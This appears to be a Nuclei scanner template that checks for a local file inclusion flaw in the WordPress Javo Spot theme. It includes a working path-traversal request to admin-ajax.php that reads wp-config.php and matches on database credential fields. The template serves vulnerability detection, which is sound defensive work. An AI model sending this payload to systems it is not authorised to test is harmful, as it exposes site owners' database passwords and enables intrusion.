id: wp-javospot-lfi

info:
  name: WordPress Javo Spot Premium Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
  reference:
    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
    - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-theme,lfi,wp,wpscan

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100d5a26ecb5591b611b16a4a1e369d97635fc7bb9905cc8c3e153e6888118b2356022100b117f48ee2a84d8badde3cc23950232db0900a4adc39618e14e488e24a65e943:922c64590222798bb761d5b6d8e72950
